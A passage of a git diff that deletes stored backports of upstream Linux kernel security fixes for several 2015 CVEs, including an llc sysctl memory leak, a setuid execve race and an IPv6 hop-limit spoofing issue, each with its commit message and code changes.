int direction, const struct iovec *iov, - unsigned long nr_segs, size_t count); -diff --git a/mm/iov_iter.c b/mm/iov_iter.c -index a5c691c..081e327 100644 ---- a/mm/iov_iter.c -+++ b/mm/iov_iter.c -@@ -82,6 +82,84 @@ done: - } - EXPORT_SYMBOL(copy_page_to_iter); - -+size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes, -+ struct iov_iter *i) -+{ -+ size_t skip, copy, left, wanted; -+ const struct iovec *iov; -+ char __user *buf; -+ void *kaddr, *to; -+ -+ if (unlikely(bytes > i->count)) -+ bytes = i->count; -+ -+ if (unlikely(!bytes)) -+ return 0; -+ -+ wanted = bytes; -+ iov = i->iov; -+ skip = i->iov_offset; -+ buf = iov->iov_base + skip; -+ copy = min(bytes, iov->iov_len - skip); -+ -+ if (!fault_in_pages_readable(buf, copy)) { -+ kaddr = kmap_atomic(page); -+ to = kaddr + offset; -+ -+ /* first chunk, usually the only one */ -+ left = __copy_from_user_inatomic(to, buf, copy); -+ copy -= left; -+ skip += copy; -+ to += copy; -+ bytes -= copy; -+ -+ while (unlikely(!left && bytes)) { -+ iov++; -+ buf = iov->iov_base; -+ copy = min(bytes, iov->iov_len); -+ left = __copy_from_user_inatomic(to, buf, copy); -+ copy -= left; -+ skip = copy; -+ to += copy; -+ bytes -= copy; -+ } -+ if (likely(!bytes)) { -+ kunmap_atomic(kaddr); -+ goto done; -+ } -+ offset = to - kaddr; -+ buf += copy; -+ kunmap_atomic(kaddr); -+ copy = min(bytes, iov->iov_len - skip); -+ } -+ /* Too bad - revert to non-atomic kmap */ -+ kaddr = kmap(page); -+ to = kaddr + offset; -+ left = __copy_from_user(to, buf, copy); -+ copy -= left; -+ skip += copy; -+ to += copy; -+ bytes -= copy; -+ while (unlikely(!left && bytes)) { -+ iov++; -+ buf = iov->iov_base; -+ copy = min(bytes, iov->iov_len); -+ left = __copy_from_user(to, buf, copy); -+ copy -= left; -+ skip = copy; -+ to += copy; -+ bytes -= copy; -+ } -+ kunmap(page); -+done: -+ i->count -= wanted - bytes; -+ i->nr_segs -= iov - i->iov; -+ i->iov = iov; -+ i->iov_offset = skip; -+ return wanted - bytes; -+} 
-+EXPORT_SYMBOL(copy_page_from_iter); -+ - static size_t __iovec_copy_from_user_inatomic(char *vaddr, - const struct iovec *iov, size_t base, size_t bytes) - { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-2041/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2015-2041/3.2/0001.patch deleted file mode 100644 index 5cf3aecf..00000000 --- a/Patches/Linux_CVEs/CVE-2015-2041/3.2/0001.patch +++ /dev/null 
@@ -1,58 +0,0 @@
-From 88fe14be08a475ad0eea4ca7c51f32437baf41af Mon Sep 17 00:00:00 2001
-From: Sasha Levin
-Date: Fri, 23 Jan 2015 20:47:00 -0500
-Subject: net: llc: use correct size for sysctl timeout entries
-
-commit 6b8d9117ccb4f81b1244aafa7bc70ef8fa45fc49 upstream.
-
-The timeout entries are sizeof(int) rather than sizeof(long), which
-means that when they were getting read we'd also leak kernel memory
-to userspace along with the timeout values.
-
-Signed-off-by: Sasha Levin
-Signed-off-by: David S. Miller
-Signed-off-by: Ben Hutchings
----
- net/llc/sysctl_net_llc.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/net/llc/sysctl_net_llc.c b/net/llc/sysctl_net_llc.c
-index e2ebe35..be078ec 100644
---- a/net/llc/sysctl_net_llc.c
-+++ b/net/llc/sysctl_net_llc.c
-@@ -17,28 +17,28 @@ static struct ctl_table llc2_timeout_table[] = {
- {
- .procname = "ack",
- .data = &sysctl_llc2_ack_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_ack_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
- {
- .procname = "busy",
- .data = &sysctl_llc2_busy_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_busy_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
- {
- .procname = "p",
- .data = &sysctl_llc2_p_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_p_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
- {
- .procname = "rej",
- .data = &sysctl_llc2_rej_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_rej_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-2041/^3.19/0002.patch b/Patches/Linux_CVEs/CVE-2015-2041/^3.19/0002.patch
deleted file mode 100644
index cabfc50a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2041/^3.19/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 6b8d9117ccb4f81b1244aafa7bc70ef8fa45fc49 Mon Sep 17 00:00:00 2001
-From: Sasha Levin
-Date: Fri, 23 Jan 2015 20:47:00 -0500
-Subject: [PATCH] net: llc: use correct size for sysctl timeout entries
-
-The timeout entries are sizeof(int) rather than sizeof(long), which
-means that when they were getting read we'd also leak kernel memory
-to userspace along with the timeout values.
-
-Signed-off-by: Sasha Levin
-Signed-off-by: David S. Miller
----
- net/llc/sysctl_net_llc.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/net/llc/sysctl_net_llc.c b/net/llc/sysctl_net_llc.c
-index 612a5ddaf93b1..799bafc2af39e 100644
---- a/net/llc/sysctl_net_llc.c
-+++ b/net/llc/sysctl_net_llc.c
-@@ -18,28 +18,28 @@ static struct ctl_table llc2_timeout_table[] = {
- {
- .procname = "ack",
- .data = &sysctl_llc2_ack_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_ack_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
- {
- .procname = "busy",
- .data = &sysctl_llc2_busy_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_busy_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
- {
- .procname = "p",
- .data = &sysctl_llc2_p_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_p_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
- {
- .procname = "rej",
- .data = &sysctl_llc2_rej_timeout,
-- .maxlen = sizeof(long),
-+ .maxlen = sizeof(sysctl_llc2_rej_timeout),
- .mode = 0644,
- .proc_handler = proc_dointvec_jiffies,
- },
diff --git a/Patches/Linux_CVEs/CVE-2015-2686/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-2686/ANY/0001.patch
deleted file mode 100644
index a8e5e83a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2686/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 4de930efc23b92ddf88ce91c405ee645fe6e27ea Mon Sep 17 00:00:00 2001
-From: Al Viro
-Date: Fri, 20 Mar 2015 17:41:43 +0000
-Subject: net: validate the range we feed to iov_iter_init() in
- sys_sendto/sys_recvfrom
-
-Cc: stable@vger.kernel.org # v3.19
-Signed-off-by: Al Viro
-Signed-off-by: David S. Miller
----
- net/socket.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/net/socket.c b/net/socket.c
-index bbedbfc..245330c 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -1702,6 +1702,8 @@ SYSCALL_DEFINE6(sendto, int, fd, void __user *, buff, size_t, len,
-
- if (len > INT_MAX)
- len = INT_MAX;
-+ if (unlikely(!access_ok(VERIFY_READ, buff, len)))
-+ return -EFAULT;
- sock = sockfd_lookup_light(fd, &err, &fput_needed);
- if (!sock)
- goto out;
-@@ -1760,6 +1762,8 @@ SYSCALL_DEFINE6(recvfrom, int, fd, void __user *, ubuf, size_t, size,
-
- if (size > INT_MAX)
- size = INT_MAX;
-+ if (unlikely(!access_ok(VERIFY_WRITE, ubuf, size)))
-+ return -EFAULT;
- sock = sockfd_lookup_light(fd, &err, &fput_needed);
- if (!sock)
- goto out;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-2922/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-2922/ANY/0001.patch
deleted file mode 100644
index 6d201090..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2922/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 6fd99094de2b83d1d4c8457f2c83483b2828e75a Mon Sep 17 00:00:00 2001
-From: "D.S. Ljungmark"
-Date: Wed, 25 Mar 2015 09:28:15 +0100
-Subject: ipv6: Don't reduce hop limit for an interface
-
-A local route may have a lower hop_limit set than global routes do.
-
-RFC 3756, Section 4.2.7, "Parameter Spoofing"
-
-> 1. The attacker includes a Current Hop Limit of one or another small
-> number which the attacker knows will cause legitimate packets to
-> be dropped before they reach their destination.
-
-> As an example, one possible approach to mitigate this threat is to
-> ignore very small hop limits. The nodes could implement a
-> configurable minimum hop limit, and ignore attempts to set it below
-> said limit.
-
-Signed-off-by: D.S. Ljungmark
-Acked-by: Hannes Frederic Sowa
-Signed-off-by: David S. Miller
----
- net/ipv6/ndisc.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
-index 471ed24..14ecdaf 100644
---- a/net/ipv6/ndisc.c
-+++ b/net/ipv6/ndisc.c
-@@ -1218,7 +1218,14 @@ static void ndisc_router_discovery(struct sk_buff *skb)
- if (rt)
- rt6_set_expires(rt, jiffies + (HZ * lifetime));
- if (ra_msg->icmph.icmp6_hop_limit) {
-- in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
-+ /* Only set hop_limit on the interface if it is higher than
-+ * the current hop_limit.
-+ */
-+ if (in6_dev->cnf.hop_limit < ra_msg->icmph.icmp6_hop_limit) {
-+ in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
-+ } else {
-+ ND_PRINTK(2, warn, "RA: Got route advertisement with lower hop_limit than current\n");
-+ }
- if (rt)
- dst_metric_set(&rt->dst, RTAX_HOPLIMIT,
- ra_msg->icmph.icmp6_hop_limit);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-3288/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-3288/ANY/0001.patch
deleted file mode 100644
index a140407e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3288/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 6b7339f4c31ad69c8e9c0b2859276e22cf72176d Mon Sep 17 00:00:00 2001
-From: "Kirill A. Shutemov"
-Date: Mon, 6 Jul 2015 23:18:37 +0300
-Subject: mm: avoid setting up anonymous pages into file mapping
-
-Reading page fault handler code I've noticed that under right
-circumstances kernel would map anonymous pages into file mappings: if
-the VMA doesn't have vm_ops->fault() and the VMA wasn't fully populated
-on ->mmap(), kernel would handle page fault to not populated pte with
-do_anonymous_page().
-
-Let's change page fault handler to use do_anonymous_page() only on
-anonymous VMA (->vm_ops == NULL) and make sure that the VMA is not
-shared.
-
-For file mappings without vm_ops->fault() or shred VMA without vm_ops,
-page fault on pte_none() entry would lead to SIGBUS.
-
-Signed-off-by: Kirill A. Shutemov
-Acked-by: Oleg Nesterov
-Cc: Andrew Morton
-Cc: Willy Tarreau
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- mm/memory.c | 20 +++++++++++++-------
- 1 file changed, 13 insertions(+), 7 deletions(-)
-
-diff --git a/mm/memory.c b/mm/memory.c
-index a84fbb7..388dcf9 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -2670,6 +2670,10 @@ static int do_anonymous_page(struct mm_struct *mm, struct vm_area_struct *vma,
-
- pte_unmap(page_table);
-
-+ /* File mapping without ->vm_ops ? */
-+ if (vma->vm_flags & VM_SHARED)
-+ return VM_FAULT_SIGBUS;
-+
- /* Check if we need to add a guard page to the stack */
- if (check_stack_guard_page(vma, address) < 0)
- return VM_FAULT_SIGSEGV;
-@@ -3099,6 +3103,9 @@ static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
- - vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;
-
- pte_unmap(page_table);
-+ /* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
-+ if (!vma->vm_ops->fault)
-+ return VM_FAULT_SIGBUS;
- if (!(flags & FAULT_FLAG_WRITE))
- return do_read_fault(mm, vma, address, pmd, pgoff, flags,
- orig_pte);
-@@ -3244,13 +3251,12 @@ static int handle_pte_fault(struct mm_struct *mm,
- barrier();
- if (!pte_present(entry)) {
- if (pte_none(entry)) {
-- if (vma->vm_ops) {
-- if (likely(vma->vm_ops->fault))
-- return do_fault(mm, vma, address, pte,
-- pmd, flags, entry);
-- }
-- return do_anonymous_page(mm, vma, address,
-- pte, pmd, flags);
-+ if (vma->vm_ops)
-+ return do_fault(mm, vma, address, pte, pmd,
-+ flags, entry);
-+
-+ return do_anonymous_page(mm, vma, address, pte, pmd,
-+ flags);
- }
- return do_swap_page(mm, vma, address,
- pte, pmd, flags, entry);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-3339/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2015-3339/3.2/0001.patch
deleted file mode 100644
index f1e7d799..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3339/3.2/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 470e517be17dd6ef8670bec7bd7831ea0d3ad8a6 Mon Sep 17 00:00:00 2001
-From: Jann Horn
-Date: Sun, 19 Apr 2015 02:48:39 +0200
-Subject: fs: take i_mutex during prepare_binprm for set[ug]id executables
-
-commit 8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 upstream.
-
-This prevents a race between chown() and execve(), where chowning a
-setuid-user binary to root would momentarily make the binary setuid
-root.
-
-This patch was mostly written by Linus Torvalds.
-
-Signed-off-by: Jann Horn
-Signed-off-by: Linus Torvalds
-[bwh: Backported to 3.2:
- - Drop the task_no_new_privs() and user namespace checks
- - Open-code file_inode()
- - s/READ_ONCE/ACCESS_ONCE/
- - Adjust context]
-Signed-off-by: Ben Hutchings
----
- fs/exec.c | 65 +++++++++++++++++++++++++++++++++++++++------------------------
- 1 file changed, 40 insertions(+), 25 deletions(-)
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 78199eb..7adb43f 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1282,6 +1282,45 @@ int check_unsafe_exec(struct linux_binprm *bprm)
- return res;
- }
-
-+static void bprm_fill_uid(struct linux_binprm *bprm)
-+{
-+ struct inode *inode;
-+ unsigned int mode;
-+ uid_t uid;
-+ gid_t gid;
-+
-+ /* clear any previous set[ug]id data from a previous binary */
-+ bprm->cred->euid = current_euid();
-+ bprm->cred->egid = current_egid();
-+
-+ if (bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID)
-+ return;
-+
-+ inode = bprm->file->f_path.dentry->d_inode;
-+ mode = ACCESS_ONCE(inode->i_mode);
-+ if (!(mode & (S_ISUID|S_ISGID)))
-+ return;
-+
-+ /* Be careful if suid/sgid is set */
-+ mutex_lock(&inode->i_mutex);
-+
-+ /* reload atomically mode/uid/gid now that lock held */
-+ mode = inode->i_mode;
-+ uid = inode->i_uid;
-+ gid = inode->i_gid;
-+ mutex_unlock(&inode->i_mutex);
-+
-+ if (mode & S_ISUID) {
-+ bprm->per_clear |= PER_CLEAR_ON_SETID;
-+ bprm->cred->euid = uid;
-+ }
-+
-+ if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
-+ bprm->per_clear |= PER_CLEAR_ON_SETID;
-+ bprm->cred->egid = gid;
-+ }
-+}
-+
- /*
- * Fill the binprm structure from the inode.
- * Check permissions, then read the first 128 (BINPRM_BUF_SIZE) bytes
-@@ -1290,36 +1329,12 @@ int check_unsafe_exec(struct linux_binprm *bprm)
- */
- int prepare_binprm(struct linux_binprm *bprm)
- {
-- umode_t mode;
-- struct inode * inode = bprm->file->f_path.dentry->d_inode;
- int retval;
-
-- mode = inode->i_mode;
- if (bprm->file->f_op == NULL)
- return -EACCES;
-
-- /* clear any previous set[ug]id data from a previous binary */
-- bprm->cred->euid = current_euid();
-- bprm->cred->egid = current_egid();
--
-- if (!(bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID)) {
-- /* Set-uid? */
-- if (mode & S_ISUID) {
-- bprm->per_clear |= PER_CLEAR_ON_SETID;
-- bprm->cred->euid = inode->i_uid;
-- }
--
-- /* Set-gid? */
-- /*
-- * If setgid is set but no group execute bit then this
-- * is a candidate for mandatory locking, not a setgid
-- * executable.
-- */
-- if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
-- bprm->per_clear |= PER_CLEAR_ON_SETID;
-- bprm->cred->egid = inode->i_gid;
-- }
-- }
-+ bprm_fill_uid(bprm);
-
- /* fill in binprm security blob */
- retval = security_bprm_set_creds(bprm);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-3339/^3.19/0002.patch b/Patches/Linux_CVEs/CVE-2015-3339/^3.19/0002.patch
deleted file mode 100644
index 5aef49e7..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3339/^3.19/0002.patch
+++ /dev/null
@@ -1,114 +0,0 @@
-From 8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 Mon Sep 17 00:00:00 2001
-From: Jann Horn
-Date: Sun, 19 Apr 2015 02:48:39 +0200
-Subject: [PATCH] fs: take i_mutex during prepare_binprm for set[ug]id
- executables
-
-This prevents a race between chown() and execve(), where chowning a
-setuid-user binary to root would momentarily make the binary setuid
-root.
-
-This patch was mostly written by Linus Torvalds.
-
-Signed-off-by: Jann Horn
-Signed-off-by: Linus Torvalds
----
- fs/exec.c | 76 ++++++++++++++++++++++++++++++++++++++++-----------------------
- 1 file changed, 48 insertions(+), 28 deletions(-)
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 02bfd980a40c7..49a1c61433b73 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1275,6 +1275,53 @@ static void check_unsafe_exec(struct linux_binprm *bprm)
- spin_unlock(&p->fs->lock);
- }
-
-+static void bprm_fill_uid(struct linux_binprm *bprm)
-+{
-+ struct inode *inode;
-+ unsigned int mode;
-+ kuid_t uid;
-+ kgid_t gid;
-+
-+ /* clear any previous set[ug]id data from a previous binary */
-+ bprm->cred->euid = current_euid();
-+ bprm->cred->egid = current_egid();
-+
-+ if (bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID)
-+ return;
-+
-+ if (task_no_new_privs(current))
-+ return;
-+
-+ inode = file_inode(bprm->file);
-+ mode = READ_ONCE(inode->i_mode);
-+ if (!(mode & (S_ISUID|S_ISGID)))
-+ return;
-+
-+ /* Be careful if suid/sgid is set */
-+ mutex_lock(&inode->i_mutex);
-+
-+ /* reload atomically mode/uid/gid now that lock held */
-+ mode = inode->i_mode;
-+ uid = inode->i_uid;
-+ gid = inode->i_gid;
-+ mutex_unlock(&inode->i_mutex);
-+
-+ /* We ignore suid/sgid if there are no mappings for them in the ns */
-+ if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
-+ !kgid_has_mapping(bprm->cred->user_ns, gid))
-+ return;
-+
-+ if (mode & S_ISUID) {
-+ bprm->per_clear |= PER_CLEAR_ON_SETID;
-+ bprm->cred->euid = uid;
-+ }
-+
-+ if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
-+ bprm->per_clear |= PER_CLEAR_ON_SETID;
-+ bprm->cred->egid = gid;
-+ }
-+}
-+
- /*
- * Fill the binprm structure from the inode.
- * Check permissions, then read the first 128 (BINPRM_BUF_SIZE) bytes
-@@ -1283,36 +1330,9 @@ static void check_unsafe_exec(struct linux_binprm *bprm)
- */
- int prepare_binprm(struct linux_binprm *bprm)
- {
-- struct inode *inode = file_inode(bprm->file);
-- umode_t mode = inode->i_mode;
- int retval;
-
--
-- /* clear any previous set[ug]id data from a previous binary */
-- bprm->cred->euid = current_euid();
-- bprm->cred->egid = current_egid();
--
-- if (!(bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID) &&
-- !task_no_new_privs(current) &&
-- kuid_has_mapping(bprm->cred->user_ns, inode->i_uid) &&
-- kgid_has_mapping(bprm->cred->user_ns, inode->i_gid)) {
-- /* Set-uid? */
-- if (mode & S_ISUID) {
-- bprm->per_clear |= PER_CLEAR_ON_SETID;
-- bprm->cred->euid = inode->i_uid;
-- }
--
-- /* Set-gid? */
-- /*
-- * If setgid is set but no group execute bit then this
-- * is a candidate for mandatory locking, not a setgid
-- * executable.
-- */
-- if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
-- bprm->per_clear |= PER_CLEAR_ON_SETID;
-- bprm->cred->egid = inode->i_gid;
-- }
-- }
-+ bprm_fill_uid(bprm);
-
- /* fill in binprm security blob */
- retval = security_bprm_set_creds(bprm);
diff --git a/Patches/Linux_CVEs/CVE-2015-3636/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-3636/ANY/0001.patch
deleted file mode 100644
index 86cee79c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3636/ANY/0001.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From a134f083e79fb4c3d0a925691e732c56911b4326 Mon Sep 17 00:00:00 2001
-From: "David S. Miller"
-Date: Fri, 1 May 2015 22:02:47 -0400
-Subject: [PATCH] ipv4: Missing sk_nulls_node_init() in ping_unhash().
-
-If we don't do that, then the poison value is left in the ->pprev
-backlink.
-
-This can cause crashes if we do a disconnect, followed by a connect().
-
-Tested-by: Linus Torvalds
-Reported-by: Wen Xu
-Signed-off-by: David S. Miller
----
- net/ipv4/ping.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
-index a93f260cf24ca..05ff44b758dfe 100644
---- a/net/ipv4/ping.c
-+++ b/net/ipv4/ping.c
-@@ -158,6 +158,7 @@ void ping_unhash(struct sock *sk)
- if (sk_hashed(sk)) {
- write_lock_bh(&ping_table.lock);
- hlist_nulls_del(&sk->sk_nulls_node);
-+ sk_nulls_node_init(&sk->sk_nulls_node);
- sock_put(sk);
- isk->inet_num = 0;
- isk->inet_sport = 0;
diff --git a/Patches/Linux_CVEs/CVE-2015-4170/3.10^/0001.patch b/Patches/Linux_CVEs/CVE-2015-4170/3.10^/0001.patch
deleted file mode 100644
index eced29e8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-4170/3.10^/0001.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From cf872776fc84128bb779ce2b83a37c884c3203ae Mon Sep 17 00:00:00 2001
-From: Peter Hurley
-Date: Wed, 11 Dec 2013 21:11:58 -0500
-Subject: tty: Fix hang at ldsem_down_read()
-
-When a controlling tty is being hung up and the hang up is
-waiting for a just-signalled tty reader or writer to exit, and a new tty
-reader/writer tries to acquire an ldisc reference concurrently with the
-ldisc reference release from the signalled reader/writer, the hangup
-can hang. The new reader/writer is sleeping in ldsem_down_read() and the
-hangup is sleeping in ldsem_down_write() [1].
-
-The new reader/writer fails to wakeup the waiting hangup because the
-wrong lock count value is checked (the old lock count rather than the new
-lock count) to see if the lock is unowned.
-
-Change helper function to return the new lock count if the cmpxchg was
-successful; document this behavior.
-
-[1] edited dmesg log from reporter
-
-SysRq : Show Blocked State
- task PC stack pid father
-systemd D ffff88040c4f0000 0 1 0 0x00000000
- ffff88040c49fbe0 0000000000000046 ffff88040c4a0000 ffff88040c49ffd8
- 00000000001d3980 00000000001d3980 ffff88040c4a0000 ffff88040593d840
- ffff88040c49fb40 ffffffff810a4cc0 0000000000000006 0000000000000023
-Call Trace:
- [] ? sched_clock_cpu+0x9f/0xe4
- [] ? sched_clock_cpu+0x9f/0xe4
- [] ? sched_clock_cpu+0x9f/0xe4
- [] ? sched_clock_cpu+0x9f/0xe4
- [] schedule+0x24/0x5e
- [] schedule_timeout+0x15b/0x1ec
- [] ? sched_clock_cpu+0x9f/0xe4
- [] ? _raw_spin_unlock_irq+0x24/0x26
- [] down_read_failed+0xe3/0x1b9
- [] ldsem_down_read+0x8b/0xa5
- [] ? tty_ldisc_ref_wait+0x1b/0x44
- [] tty_ldisc_ref_wait+0x1b/0x44
- [] tty_write+0x7d/0x28a
- [] redirected_tty_write+0x8d/0x98
- [] ? tty_write+0x28a/0x28a
- [] do_loop_readv_writev+0x56/0x79
- [] do_readv_writev+0x1b0/0x1ff
- [] ? do_vfs_ioctl+0x32a/0x489
- [] ? final_putname+0x1d/0x3a
- [] vfs_writev+0x2e/0x49
- [] SyS_writev+0x47/0xaa
- [] system_call_fastpath+0x16/0x1b
-bash D ffffffff81c104c0 0 5469 5302 0x00000082
- ffff8800cf817ac0 0000000000000046 ffff8804086b22a0 ffff8800cf817fd8
- 00000000001d3980 00000000001d3980 ffff8804086b22a0 ffff8800cf817a48
- 000000000000b9a0 ffff8800cf817a78 ffffffff81004675 ffff8800cf817a44
-Call Trace:
- [] ? dump_trace+0x165/0x29c
- [] ? sched_clock_cpu+0x9f/0xe4
- [] ? save_stack_trace+0x26/0x41
- [] schedule+0x24/0x5e
- [] schedule_timeout+0x15b/0x1ec
- [] ? sched_clock_cpu+0x9f/0xe4
- [] ? down_write_failed+0xa3/0x1c9
- [] ? _raw_spin_unlock_irq+0x24/0x26
- [] down_write_failed+0xab/0x1c9
- [] ldsem_down_write+0x79/0xb1
- [] ? tty_ldisc_lock_pair_timeout+0xa5/0xd9
- [] tty_ldisc_lock_pair_timeout+0xa5/0xd9
- [] tty_ldisc_hangup+0xc4/0x218
- [] __tty_hangup+0x2e2/0x3ed
- [] disassociate_ctty+0x63/0x226
- [] do_exit+0x79f/0xa11
- [] ? get_signal_to_deliver+0x206/0x62f
- [] ? lock_release_holdtime.part.8+0xf/0x16e
- [] do_group_exit+0x47/0xb5
- [] get_signal_to_deliver+0x241/0x62f
- [] do_signal+0x43/0x59d
- [] ? __audit_syscall_exit+0x21a/0x2a8
- [] ? lock_release_holdtime.part.8+0xf/0x16e
- [] do_notify_resume+0x54/0x6c
- [] int_signal+0x12/0x17
-
-Reported-by: Sami Farin
-Cc: # 3.12.x
-Signed-off-by: Peter Hurley
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/tty/tty_ldsem.c | 16 +++++++++++++---
- 1 file changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/tty/tty_ldsem.c b/drivers/tty/tty_ldsem.c
-index 22fad8a..d8a55e8 100644
---- a/drivers/tty/tty_ldsem.c
-+++ b/drivers/tty/tty_ldsem.c
-@@ -86,11 +86,21 @@ static inline long ldsem_atomic_update(long delta, struct ld_semaphore *sem)
- return atomic_long_add_return(delta, (atomic_long_t *)&sem->count);
- }
-
-+/*
-+ * ldsem_cmpxchg() updates @*old with the last-known sem->count value.
-+ * Returns 1 if count was successfully changed; @*old will have @new value.
-+ * Returns 0 if count was not changed; @*old will have most recent sem->count
-+ */
- static inline int ldsem_cmpxchg(long *old, long new, struct ld_semaphore *sem)
- {
-- long tmp = *old;
-- *old = atomic_long_cmpxchg(&sem->count, *old, new);
-- return *old == tmp;
-+ long tmp = atomic_long_cmpxchg(&sem->count, *old, new);
-+ if (tmp == *old) {
-+ *old = new;
-+ return 1;
-+ } else {
-+ *old = tmp;
-+ return 0;
-+ }
- }
-
- /*
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-4177/4.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-4177/4.0/0001.patch
deleted file mode 100644
index c56630e2..00000000
--- a/Patches/Linux_CVEs/CVE-2015-4177/4.0/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From cd4a40174b71acd021877341684d8bb1dc8ea4ae Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman"
-Date: Wed, 7 Jan 2015 14:28:26 -0600
-Subject: [PATCH] mnt: Fail collect_mounts when applied to unmounted mounts
-
-The only users of collect_mounts are in audit_tree.c
-
-In audit_trim_trees and audit_add_tree_rule the path passed into
-collect_mounts is generated from kern_path passed an audit_tree
-pathname which is guaranteed to be an absolute path. In those cases
-collect_mounts is obviously intended to work on mounted paths and
-if a race results in paths that are unmounted when collect_mounts
-it is reasonable to fail early.
-
-The paths passed into audit_tag_tree don't have the absolute path
-check. But are used to play with fsnotify and otherwise interact with
-the audit_trees, so again operating only on mounted paths appears
-reasonable.
-
-Avoid having to worry about what happens when we try and audit
-unmounted filesystems by restricting collect_mounts to mounts
-that appear in the mount tree.
-
-Signed-off-by: "Eric W. Biederman"
----
- fs/namespace.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index 2b12b7a9455d0..acc5583764dc0 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -1669,8 +1669,11 @@ struct vfsmount *collect_mounts(struct path *path)
- {
- struct mount *tree;
- namespace_lock();
-- tree = copy_tree(real_mount(path->mnt), path->dentry,
-- CL_COPY_ALL | CL_PRIVATE);
-+ if (!check_mnt(real_mount(path->mnt)))
-+ tree = ERR_PTR(-EINVAL);
-+ else
-+ tree = copy_tree(real_mount(path->mnt), path->dentry,
-+ CL_COPY_ALL | CL_PRIVATE);
- namespace_unlock();
- if (IS_ERR(tree))
- return ERR_CAST(tree);
